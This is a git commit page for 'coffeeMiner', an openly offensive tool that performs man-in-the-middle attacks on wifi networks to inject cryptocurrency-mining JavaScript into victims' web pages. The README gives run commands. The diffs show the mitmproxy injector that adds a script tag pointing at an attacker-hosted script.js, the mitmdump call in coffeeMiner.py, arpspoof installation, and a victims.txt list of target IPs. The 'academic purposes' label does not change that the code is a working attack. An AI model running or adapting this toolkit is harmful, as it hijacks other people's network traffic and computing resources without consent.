Browse Source

readme updated, removed comments

master
arnaucode 6 years ago
parent
commit
7a9270e7d8
9 changed files with 15 additions and 22 deletions
  1. +9
    -2
      README.md
  2. BIN
      coffeeMiner-demo-cutted.gif
  3. BIN
      coffeeMiner-logo-small.png
  4. BIN
      coffeeMiner-network-attack.png
  5. +1
    -1
      coffeeMiner.py
  6. +0
    -15
      injector.py
  7. +0
    -2
      install.sh
  8. BIN
      network.png
  9. +5
    -2
      victims.txt

+ 9
- 2
README.md

@ -4,6 +4,9 @@ Collaborative (mitm) cryptocurrency mining pool in wifi networks
**Warning: this project is for academic/research purposes only.**
A blog post about this project can be read here: http://arnaucode.com/blog/coffeeminer-hacking-wifi-cryptocurrency-miner.html
![coffeeMiner](https://raw.githubusercontent.com/arnaucode/coffeeMiner/master/coffeeMiner-logo-small.png "coffeeMiner")
## Concept
- Performs a MITM attack to all selected victims
@ -22,12 +25,16 @@ bash install.sh
```py
os.system("~/.local/bin/mitmdump -s 'injector.py http://10.0.2.20:8000/script.js' -T")
```
- run.py
- execute coffeeMiner.py
```
python3 coffeeMiner.py ipgateway
```
![network](https://raw.githubusercontent.com/arnaucode/coffeeMiner/master/network.png "network")
![network](https://raw.githubusercontent.com/arnaucode/coffeeMiner/master/coffeeMiner-network-attack.png "network")
A complete instructions for academic scenario can be found in https://github.com/arnaucode/coffeeMiner/blob/master/virtualbox_scenario_instructions.md
![demo](https://raw.githubusercontent.com/arnaucode/coffeeMiner/master/coffeeMiner-demo-cutted.gif "demo")

BIN
coffeeMiner-demo-cutted.gif

Before After
Width: 600  |  Height: 497  |  Size: 2.5 MiB

BIN
coffeeMiner-logo-small.png

Before After
Width: 179  |  Height: 196  |  Size: 20 KiB

BIN
coffeeMiner-network-attack.png

Before After
Width: 539  |  Height: 438  |  Size: 75 KiB

+ 1
- 1
coffeeMiner.py

@ -25,7 +25,7 @@ for victim in victims:
os.system("xterm -hold -e 'python3 httpServer.py' &")
# start the mitmproxy
os.system("~/.local/bin/mitmdump -s 'injector.py http://10.0.2.20:8000/script.js' -T")
os.system("~/.local/bin/mitmdump -s 'injector.py http://192.168.1.32:8000/script.js' -T")
'''

+ 0
- 15
injector.py

@ -5,29 +5,16 @@ from mitmproxy import ctx, http
import argparse
class Injector:
'''
def load(self, loader):
loader.add_option(
"scr_url", str, "", "script_url to inject"
)
'''
def __init__(self, path):
self.path = path
def response(self, flow: http.HTTPFlow) -> None:
#print("hola hola hola")
#print(self.path)
if self.path:
html = BeautifulSoup(flow.response.content, "html.parser")
print(self.path)
print(flow.response.headers["content-type"])
if flow.response.headers["content-type"] == 'text/html':
print("uuuuuu")
print(flow.response.headers["content-type"])
print("asdf asdf asdf asdf asdf")
print("-----")
print("mmmmm")
script = html.new_tag(
"script",
src=self.path,
@ -41,5 +28,3 @@ def start():
parser.add_argument("path", type=str)
args = parser.parse_args()
return Injector(args.path)
#addons = [Injector()]

+ 0
- 2
install.sh

@ -1,5 +1,3 @@
#TODO put --yes to all installation commands
# install arpspoof (dsniff)
apt-get -y install dsniff

BIN
network.png

Before After
Width: 501  |  Height: 501  |  Size: 76 KiB

+ 5
- 2
victims.txt

@ -1,2 +1,5 @@
192.168.1.30
192.168.1.31
192.168.1.41
192.168.1.35
192.168.1.45
192.168.1.48
192.168.1.38

Loading…
Cancel
Save